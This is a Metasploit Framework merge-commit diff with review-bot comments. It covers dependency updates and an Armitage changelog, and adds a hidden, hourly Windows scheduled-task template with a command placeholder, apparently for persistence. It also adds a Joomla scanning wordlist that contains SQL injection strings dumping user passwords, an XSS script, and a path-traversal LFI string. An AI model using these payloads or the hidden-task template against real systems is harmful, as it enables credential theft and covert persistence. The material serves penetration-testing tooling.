Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7
commit
c423ad2583
|
@ -1,4 +1,8 @@
|
|||
language: ruby
|
||||
before_install:
|
||||
- sudo apt-get update -qq
|
||||
- sudo apt-get install -qq libpcap-dev
|
||||
|
||||
rvm:
|
||||
#- '1.8.7'
|
||||
- '1.9.3'
|
||||
|
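Review bot: The new `before_install` step installs `libpcap-dev` with no comment saying which dependency needs it. The Gemfile change in this same commit adds `gem 'pcaprub'`, so a one-line comment above the `apt-get install` line naming pcaprub would stop someone from dropping the package later as unused. The `-qq` flag already implies a non-interactive yes, so no `-y` is needed.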
@ -6,3 +10,5 @@ rvm:
|
|||
notifications:
|
||||
irc: "irc.freenode.org#msfnotify"
|
||||
|
||||
git:
|
||||
depth: 1
|
||||
|
|
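Review bot: `depth: 1` under `git:` can make builds fail intermittently. CI checks out the exact commit that triggered the build, and if the branch has moved on by the time the job starts, a one-commit shallow clone will not contain that commit. A slightly larger depth keeps most of the speed-up while tolerating a few pushes in quick succession.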
12
Gemfile
|
@ -4,10 +4,20 @@ source 'http://rubygems.org'
|
|||
gem 'activesupport', '>= 3.0.0'
|
||||
# Needed for Msf::DbManager
|
||||
gem 'activerecord'
|
||||
# Needed for some admin modules (scrutinizer_add_user.rb)
|
||||
gem 'json'
|
||||
# Database models shared between framework and Pro.
|
||||
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0'
|
||||
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0'
|
||||
# Needed by msfgui and other rpc components
|
||||
gem 'msgpack'
|
||||
# Needed by anemone crawler
|
||||
gem 'nokogiri'
|
||||
# Needed for module caching in Mdm::ModuleDetails
|
||||
gem 'pg', '>= 0.11'
|
||||
# Needed by anemone crawler
|
||||
gem 'robots'
|
||||
# For sniffer and raw socket modules
|
||||
gem 'pcaprub'
|
||||
|
||||
group :development do
|
||||
# Markdown formatting for yard
|
||||
|
|
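Review bot: The `metasploit_data_models` line still fetches over `git://github.com/...`, which is unauthenticated and unencrypted, so the bump to `:tag => '0.4.0'` is a good moment to switch the URL to `https://`. A tag can also be moved upstream; the revision recorded in Gemfile.lock is what actually pins the code, so the lock file needs to be reviewed together with this change. The gems added here (`json`, `msgpack`, `nokogiri`, `robots`, `pcaprub`) carry no version constraint in the Gemfile, which leaves Gemfile.lock as the only thing holding their versions.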
30
Gemfile.lock
|
@ -1,10 +1,10 @@
|
|||
GIT
|
||||
remote: git://github.com/rapid7/metasploit_data_models.git
|
||||
revision: 73f26789500f278dd6fd555e839d09a3b81a05f4
|
||||
tag: 0.3.0
|
||||
revision: 448c1065329efea1eac76a3897f626f122666743
|
||||
tag: 0.4.0
|
||||
specs:
|
||||
metasploit_data_models (0.3.0)
|
||||
activerecord
|
||||
metasploit_data_models (0.4.0)
|
||||
activerecord (>= 3.2.10)
|
||||
activesupport
|
||||
pg
|
||||
pry
|
||||
|
@ -12,15 +12,15 @@ GIT
|
|||
GEM
|
||||
remote: http://rubygems.org/
|
||||
specs:
|
||||
activemodel (3.2.9)
|
||||
activesupport (= 3.2.9)
|
||||
activemodel (3.2.11)
|
||||
activesupport (= 3.2.11)
|
||||
builder (~> 3.0.0)
|
||||
activerecord (3.2.9)
|
||||
activemodel (= 3.2.9)
|
||||
activesupport (= 3.2.9)
|
||||
activerecord (3.2.11)
|
||||
activemodel (= 3.2.11)
|
||||
activesupport (= 3.2.11)
|
||||
arel (~> 3.0.2)
|
||||
tzinfo (~> 0.3.29)
|
||||
activesupport (3.2.9)
|
||||
activesupport (3.2.11)
|
||||
i18n (~> 0.6)
|
||||
multi_json (~> 1.0)
|
||||
arel (3.0.2)
|
||||
|
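Review bot: The `remote: http://rubygems.org/` line at the top of the GEM section means every gem in this lock file, including the bumped `activerecord (3.2.11)` and `activesupport (3.2.11)`, is downloaded over cleartext HTTP. Change `source 'http://rubygems.org'` in the Gemfile to `https://rubygems.org` and regenerate the lock so the remote here follows.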
@ -28,8 +28,12 @@ GEM
|
|||
coderay (1.0.8)
|
||||
diff-lcs (1.1.3)
|
||||
i18n (0.6.1)
|
||||
json (1.7.7)
|
||||
method_source (0.8.1)
|
||||
msgpack (0.5.2)
|
||||
multi_json (1.0.4)
|
||||
nokogiri (1.5.6)
|
||||
pcaprub (0.11.3)
|
||||
pg (0.14.1)
|
||||
pry (0.9.10)
|
||||
coderay (~> 1.0.5)
|
||||
|
@ -37,6 +41,7 @@ GEM
|
|||
slop (~> 3.3.1)
|
||||
rake (10.0.2)
|
||||
redcarpet (2.2.2)
|
||||
robots (0.10.1)
|
||||
rspec (2.12.0)
|
||||
rspec-core (~> 2.12.0)
|
||||
rspec-expectations (~> 2.12.0)
|
||||
|
@ -59,10 +64,15 @@ PLATFORMS
|
|||
DEPENDENCIES
|
||||
activerecord
|
||||
activesupport (>= 3.0.0)
|
||||
json
|
||||
metasploit_data_models!
|
||||
msgpack
|
||||
nokogiri
|
||||
pcaprub
|
||||
pg (>= 0.11)
|
||||
rake
|
||||
redcarpet
|
||||
robots
|
||||
rspec (>= 2.12)
|
||||
simplecov (= 0.5.4)
|
||||
yard
|
||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -1,6 +1,55 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
12 Feb 13 (tested against msf 16438)
|
||||
---------
|
||||
- Fixed a corner case preventing the display of removed host labels
|
||||
when connected to a team server.
|
||||
- Fixed RPC call cache corruption in team server mode. This bug could
|
||||
lead to some exploits defaulting to a shell payload when meterpreter
|
||||
was a possibility.
|
||||
- Slight optimization to some DB queries. I no longer pull unused
|
||||
fields making the query marginally faster. Team server is more
|
||||
efficient too as changes to unused fields won't force data (re)sync.
|
||||
- Hosts -> Clear Database now clears host labels too.
|
||||
- Added the ability to manage multiple team server instances through
|
||||
Armitage. Go to Armitage -> New Connection to connect to another
|
||||
server. A button bar will appear that allows you to switch active
|
||||
Armitage connections.
|
||||
- Credentials available across instances are pooled when using
|
||||
the [host] -> Login menu and the credential helper.
|
||||
- Rewrote the event log management code in the team server
|
||||
- Added nickname tab completion to event log. I feel like I'm writing
|
||||
an IRC client again.
|
||||
- Hosts -> Clear Database now asks you to confirm the action.
|
||||
- Hosts -> Import Hosts announces successful import to event log again.
|
||||
|
||||
23 Jan 13 (tested against msf 16351)
|
||||
---------
|
||||
- Added helpers to set EXE::Custom and EXE::Template options.
|
||||
- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
|
||||
- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
|
||||
check if a proxy server is up was deadlock prone. Removed it.
|
||||
- Starting SOCKS Proxy module now opens a tab displaying the module
|
||||
start process. An event is posted to the event log too.
|
||||
- Created an option helper to select credentials for SMBUser, SMBPass,
|
||||
USERNAME, and PASSWORD.
|
||||
- Added a feature to label hosts. A label will show up in its own column
|
||||
in table view or below all info in graph view. Any team member may
|
||||
change a label through [host] -> host -> Set Label. You may also use
|
||||
dynamic workspaces to show hosts with certain labels attached.
|
||||
- Fixed bad things happening when connecting Armitage to 'localhost' and
|
||||
not '127.0.0.1'.
|
||||
- Screenshots and Webcam shots are now centered in their tab.
|
||||
- Added an alternate .bat file to start msfrpcd on Windows in the
|
||||
Metasploit 4.5 installer's environment.
|
||||
- Added a color-style for [!] warning messages
|
||||
|
||||
Cortana Updates (for scripters)
|
||||
--------
|
||||
- &handler function now works as advertised.
|
||||
- Cortana now avoids use of core.setg
|
||||
|
||||
4 Jan 13 (tested against msf 16252)
|
||||
--------
|
||||
- Added a helper to set REXE option
|
||||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/></Types>
|
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
|
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>normal.dot</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>3</Characters><Application>Microsoft Office Outlook</Application><DocSecurity>0</DocSecurity><Lines>0</Lines><Paragraphs>0</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>0</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>12.0000</AppVersion></Properties>
|
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships>
|
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00E97639" w:rsidRDefault="00E97639"><w:r><w:t> </w:t></w:r></w:p><w:sectPr w:rsidR="00E97639" w:rsidSect="00B25E88"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
|
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="20002A87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000004B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font></w:fonts>
|
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main"><w:zoom w:percent="100"/><w:embedSystemFonts/><w:attachedTemplate r:id="rId1"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:doNotValidateAgainstSchema/><w:doNotDemarcateInvalidXml/><w:compat><w:useNormalStyleForList/><w:doNotUseIndentAsNumberingTabStop/><w:useAltKinsokuLineBreakRules/><w:allowSpaceOfSameStyleInTable/><w:doNotSuppressIndentation/><w:doNotAutofitConstrainedTables/><w:autofitToFirstFixedWidthCell/><w:underlineTabInNumList/><w:displayHangulFixedWidth/><w:splitPgBreakAndParaMark/><w:doNotVertAlignCellWithSp/><w:doNotBreakConstrainedForcedTable/><w:doNotVertAlignInTxbx/><w:useAnsiKerningPairs/><w:cachedColBalance/></w:compat><w:rsids><w:rsidRoot w:val="00B25E88"/><w:rsid w:val="00890656"/><w:rsid w:val="00B25E88"/><w:rsid w:val="00E97639"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="off"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:uiCompat97To2003/><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:doNotIncludeSubdocsInStats/><w:doNotAutoCompressPictures/><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings>
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:optimizeForBrowser/></w:webSettings>
|
|
@ -0,0 +1,50 @@
|
|||
<?xml version="1.0" encoding="UTF-16"?>
|
||||
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
|
||||
<RegistrationInfo>
|
||||
<Date>DATEHERE</Date>
|
||||
<Author>USERHERE</Author>
|
||||
</RegistrationInfo>
|
||||
<Triggers>
|
||||
<TimeTrigger>
|
||||
<Repetition>
|
||||
<Interval>PT60M</Interval>
|
||||
<StopAtDurationEnd>false</StopAtDurationEnd>
|
||||
</Repetition>
|
||||
<StartBoundary>DATEHERE</StartBoundary>
|
||||
<Enabled>true</Enabled>
|
||||
</TimeTrigger>
|
||||
</Triggers>
|
||||
<Principals>
|
||||
<Principal id="Author">
|
||||
<UserId>DOMAINHERE</UserId>
|
||||
<LogonType>S4U</LogonType>
|
||||
<RunLevel>LeastPrivilege</RunLevel>
|
||||
</Principal>
|
||||
</Principals>
|
||||
<Settings>
|
||||
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
|
||||
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
|
||||
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
|
||||
<AllowHardTerminate>true</AllowHardTerminate>
|
||||
<StartWhenAvailable>false</StartWhenAvailable>
|
||||
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
|
||||
<IdleSettings>
|
||||
<Duration>PT10M</Duration>
|
||||
<WaitTimeout>PT1H</WaitTimeout>
|
||||
<StopOnIdleEnd>true</StopOnIdleEnd>
|
||||
<RestartOnIdle>false</RestartOnIdle>
|
||||
</IdleSettings>
|
||||
<AllowStartOnDemand>true</AllowStartOnDemand>
|
||||
<Enabled>true</Enabled>
|
||||
<Hidden>true</Hidden>
|
||||
<RunOnlyIfIdle>false</RunOnlyIfIdle>
|
||||
<WakeToRun>false</WakeToRun>
|
||||
<ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
|
||||
<Priority>7</Priority>
|
||||
</Settings>
|
||||
<Actions Context="Author">
|
||||
<Exec>
|
||||
<Command>COMMANDHERE</Command>
|
||||
</Exec>
|
||||
</Actions>
|
||||
</Task>
|
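Review bot: The prolog declares `encoding="UTF-16"`, so the code that fills in this template has to write the result as UTF-16 or rewrite the declaration; a file whose bytes do not match the declared encoding can be rejected as malformed on import. The placeholders also need documenting: `DATEHERE` is used for both `<Date>` and `<StartBoundary>`, `DOMAINHERE` sits inside `<UserId>` although its name suggests only a domain, and whatever replaces `COMMANDHERE` and `USERHERE` must be XML-escaped (`&`, `<`, `>`) before substitution. A short comment at the top of the file listing the four placeholders and their expected formats would cover this.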
Binary file not shown.
|
@ -1,20 +0,0 @@
|
|||
class AddCredFileTable < ActiveRecord::Migration
|
||||
|
||||
def self.up
|
||||
create_table :cred_files do |t|
|
||||
t.integer :workspace_id, :null => false, :default => 1
|
||||
t.string :path, :limit => 1024
|
||||
t.string :ftype, :limit => 16
|
||||
t.string :created_by
|
||||
t.string :name, :limit => 512
|
||||
t.string :desc, :limit => 1024
|
||||
|
||||
t.timestamps
|
||||
end
|
||||
end
|
||||
|
||||
def self.down
|
||||
drop_table :cred_files
|
||||
end
|
||||
|
||||
end
|
|
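Review bot: Removing the `AddCredFileTable` migration leaves no visible replacement in this diff for creating `cred_files`, and the commit message does not say where it went. If the migration now ships with `metasploit_data_models` 0.4.0 (bumped in the Gemfile in this same commit), say so in the commit message or changelog, and confirm that a fresh database still ends up with the `cred_files` table and that already-migrated databases do not report a missing migration.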
@ -0,0 +1,627 @@
|
|||
&controller=../../../../../../../../../../../../[LFI]%00
|
||||
?1.5.10-x
|
||||
?1.5.11-x-http_ref
|
||||
?1.5.11-x-php-s3lf
|
||||
?1.5.3-path-disclose
|
||||
?1.5.3-spam
|
||||
?1.5.8-x
|
||||
?1.5.9-x
|
||||
?j1012-fixate-session
|
||||
?option=com_mysms&Itemid=0&task=phonebook
|
||||
Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
|
||||
admin/
|
||||
administrator/
|
||||
administrator/components/
|
||||
administrator/components/com_a6mambocredits/
|
||||
administrator/components/com_a6mambohelpdesk/
|
||||
administrator/components/com_admin/admin.admin.html.php
|
||||
administrator/components/com_astatspro/refer.php
|
||||
administrator/components/com_bayesiannaivefilter/
|
||||
administrator/components/com_chronocontact/excelwriter/PPS/File.php
|
||||
administrator/components/com_colophon/
|
||||
administrator/components/com_colorlab/
|
||||
administrator/components/com_comprofiler/
|
||||
administrator/components/com_comprofiler/plugin.class.php
|
||||
administrator/components/com_cropimage/admin.cropcanvas.php
|
||||
administrator/components/com_extplorer/
|
||||
administrator/components/com_feederator/includes/tmsp/add_tmsp.php
|
||||
administrator/components/com_googlebase/
|
||||
administrator/components/com_installer
|
||||
administrator/components/com_jcs/
|
||||
administrator/components/com_jim/
|
||||
administrator/components/com_jjgallery/
|
||||
administrator/components/com_joom12pic/
|
||||
administrator/components/com_joomla-visites/
|
||||
administrator/components/com_joomla_flash_uploader/
|
||||
administrator/components/com_joomlaflashfun/
|
||||
administrator/components/com_joomlaradiov5/
|
||||
administrator/components/com_jpack/
|
||||
administrator/components/com_jreactions/
|
||||
administrator/components/com_juser/
|
||||
administrator/components/com_admin/
|
||||
administrator/components/com_kochsuite /
|
||||
administrator/components/com_linkdirectory/
|
||||
administrator/components/com_livechat/getSavedChatRooms.php
|
||||
administrator/components/com_livechat/xmlhttp.php
|
||||
administrator/components/com_lurm_constructor/admin.lurm_constructor.php
|
||||
administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
|
||||
administrator/components/com_mambelfish/
|
||||
administrator/components/com_mgm/
|
||||
administrator/components/com_mmp/help.mmp.php
|
||||
administrator/components/com_mosmedia/
|
||||
administrator/components/com_multibanners/extadminmenus.class.php
|
||||
administrator/components/com_panoramic/
|
||||
administrator/components/com_peoplebook/param.peoplebook.php
|
||||
administrator/components/com_phpshop/toolbar.phpshop.html.php
|
||||
administrator/components/com_remository/admin.remository.php
|
||||
administrator/components/com_serverstat/install.serverstat.php
|
||||
administrator/components/com_simpleswfupload/uploadhandler.php");
|
||||
administrator/components/com_swmenupro/
|
||||
administrator/components/com_treeg/
|
||||
administrator/components/com_uhp/
|
||||
administrator/components/com_uhp2/
|
||||
administrator/components/com_webring/
|
||||
administrator/components/com_wmtgallery/
|
||||
administrator/components/com_wmtportfolio/
|
||||
administrator/components/com_x-shop/
|
||||
administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
|
||||
administrator/index.php?option=com_searchlog&act=log
|
||||
ajaxim/
|
||||
akocomments.php
|
||||
cart?Itemid=[SQLi]
|
||||
component/com__brightweblinks/
|
||||
component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
|
||||
component/osproperty/?task=agent_register
|
||||
component/quran/index.php?option=com_quran&action=viewayat&surano=
|
||||
components/com_ clickheat/
|
||||
components/com_5starhotels/
|
||||
components/com_Jambook/jambook.php
|
||||
components/com_a6mambocredits/
|
||||
components/com_a6mambohelpdesk/
|
||||
components/com_ab_gallery/
|
||||
components/com_acajoom/
|
||||
components/com_acctexp/
|
||||
components/com_aclassf/
|
||||
components/com_activities/
|
||||
components/com_actualite/
|
||||
components/com_admin/admin.admin.html.php
|
||||
components/com_advancedpoll/
|
||||
components/com_agora/
|
||||
components/com_agoragroup/
|
||||
components/com_ajaxchat/
|
||||
components/com_akobook/
|
||||
components/com_akocomment/
|
||||
components/com_akogallery
|
||||
components/com_alberghi/
|
||||
components/com_allhotels/
|
||||
components/com_alphacontent/
|
||||
components/com_altas/
|
||||
components/com_amocourse/
|
||||
components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
|
||||
components/com_articles/
|
||||
components/com_artist/
|
||||
components/com_artlinks/
|
||||
components/com_asortyment/
|
||||
components/com_astatspro/
|
||||
components/com_awesom/
|
||||
components/com_babackup/
|
||||
components/com_banners/
|
||||
components/com_bayesiannaivefilter/
|
||||
components/com_be_it_easypartner/
|
||||
components/com_beamospetition/
|
||||
components/com_biblestudy/
|
||||
components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
|
||||
components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
|
||||
components/com_blog/
|
||||
components/com_bookflip/
|
||||
components/com_bookjoomlas/
|
||||
components/com_booklibrary/
|
||||
components/com_books/
|
||||
components/com_bsadv/
|
||||
components/com_bsq_sitestats/
|
||||
components/com_bsq_sitestats/external/rssfeed.php
|
||||
components/com_bsqsitestats/
|
||||
components/com_calendar/
|
||||
components/com_camelcitydb2/
|
||||
components/com_candle/
|
||||
components/com_casino_blackjack/
|
||||
components/com_casino_videopoker/
|
||||
components/com_casinobase/
|
||||
components/com_catalogproduction/
|
||||
components/com_catalogshop/
|
||||
components/com_category/
|
||||
components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
|
||||
components/com_chronocontact/excelwriter/PPS/File.php
|
||||
components/com_cinema/
|
||||
components/com_clasifier/
|
||||
components/com_classifieds/
|
||||
components/com_clickheat/
|
||||
components/com_cloner/
|
||||
components/com_cmimarketplace/
|
||||
components/com_cms/
|
||||
components/com_colophon/
|
||||
components/com_colorlab/
|
||||
components/com_competitions/
|
||||
components/com_comprofiler/
|
||||
components/com_comprofiler/plugin.class.php
|
||||
components/com_contactinfo/
|
||||
components/com_content/
|
||||
components/com_cpg/cpg.php
|
||||
components/com_cropimage/admin.cropcanvas.php
|
||||
components/com_custompages/
|
||||
components/com_cx/
|
||||
components/com_d3000/
|
||||
components/com_dadamail/
|
||||
components/com_dailymessage/
|
||||
components/com_datsogallery/
|
||||
components/com_dbquery/
|
||||
components/com_detail/
|
||||
components/com_digistore/
|
||||
components/com_directory/
|
||||
components/com_djiceshoutbox/
|
||||
components/com_doc/
|
||||
components/com_downloads/
|
||||
components/com_ds-syndicate/
|
||||
components/com_dtregister/
|
||||
components/com_dv/externals/phpupload/upload.php");
|
||||
components/com_easybook/
|
||||
components/com_emcomposer/
|
||||
components/com_equotes/
|
||||
components/com_estateagent/
|
||||
components/com_eventing/
|
||||
components/com_eventlist/
|
||||
components/com_events/
|
||||
components/com_ewriting/
|
||||
components/com_expose/uploadimg.php
|
||||
components/com_expshop/
|
||||
components/com_extcalendar/
|
||||
components/com_extcalendar/cal_popup.php?extmode=view&extid=
|
||||
components/com_extcalendar/extcalendar.php
|
||||
components/com_extended_registration/registration_detailed.inc.php
|
||||
components/com_extplorer/
|
||||
components/com_ezine/
|
||||
components/com_ezstore/
|
||||
components/com_facileforms/
|
||||
components/com_fantasytournament/
|
||||
components/com_faq/
|
||||
components/com_feederator/includes/tmsp/add_tmsp.php
|
||||
components/com_filebase/
|
||||
components/com_filiale/
|
||||
components/com_flashfun/
|
||||
components/com_flashmagazinedeluxe/
|
||||
components/com_flippingbook/
|
||||
components/com_flyspray/startdown.php
|
||||
components/com_fm/fm.install.php
|
||||
components/com_foevpartners/
|
||||
components/com_football/
|
||||
components/com_formtool/
|
||||
components/com_forum/
|
||||
components/com_fq/
|
||||
components/com_fundraiser/
|
||||
components/com_galeria/
|
||||
components/com_galleria/galleria.html.php
|
||||
components/com_gallery/
|
||||
components/com_game/
|
||||
components/com_gameq/
|
||||
components/com_garyscookbook/
|
||||
components/com_genealogy/
|
||||
components/com_geoboerse/
|
||||
components/com_gigcal/
|
||||
components/com_gmaps/
|
||||
components/com_googlebase/
|
||||
components/com_gsticketsystem/
|
||||
components/com_guide/
|
||||
components/com_hashcash/server.php
|
||||
components/com_hbssearch/
|
||||
components/com_hello_world/
|
||||
components/com_hotproperties/
|
||||
components/com_hotproperty/
|
||||
components/com_hotspots/
|
||||
components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
|
||||
components/com_hwdvideoshare/
|
||||
components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
|
||||
components/com_ice/
|
||||
components/com_idoblog/
|
||||
components/com_idvnews/
|
||||
components/com_ignitegallery/
|
||||
components/com_ijoomla_archive/
|
||||
components/com_ijoomla_rss/
|
||||
components/com_inter/
|
||||
components/com_ionfiles/
|
||||
components/com_is/
|
||||
components/com_ixxocart/
|
||||
components/com_jabode/
|
||||
components/com_jashowcase/
|
||||
components/com_jb2/
|
||||
components/com_jce/
|
||||
components/com_jcs/
|
||||
components/com_jd-wiki/
|
||||
components/com_jd-wp/
|
||||
components/com_jim/
|
||||
components/com_jjgallery/
|
||||
components/com_jmovies/
|
||||
components/com_jobline/
|
||||
components/com_jombib/
|
||||
components/com_joobb/
|
||||
components/com_jooget/
|
||||
components/com_joom12pic/
|
||||
components/com_joomla-visites/
|
||||
components/com_joomla_flash_uploader/
|
||||
components/com_joomlaboard/
|
||||
components/com_joomladate/
|
||||
components/com_joomlaflashfun/
|
||||
components/com_joomlalib/
|
||||
components/com_joomlaradiov5/
|
||||
components/com_joomlavvz/
|
||||
components/com_joomlaxplorer/
|
||||
components/com_joomloads/
|
||||
components/com_joomradio/
|
||||
components/com_joomtracker/
|
||||
components/com_joovideo/
|
||||
components/com_jotloader/
|
||||
components/com_journal/
|
||||
components/com_jpack/
|
||||
components/com_jpad/
|
||||
components/com_jreactions/
|
||||
components/com_jreviews/scripts/xajax.inc.php
|
||||
components/com_jumi/
|
||||
components/com_juser/
|
||||
components/com_jvideo/
|
||||
components/com_k2/
|
||||
components/com_kbase/
|
||||
components/com_knowledgebase/fckeditor/fckeditor.js
|
||||
components/com_kochsuite /
|
||||
components/com_kunena/
|
||||
components/com_letterman/
|
||||
components/com_lexikon/
|
||||
components/com_linkdirectory/
|
||||
components/com_listoffreeads/
|
||||
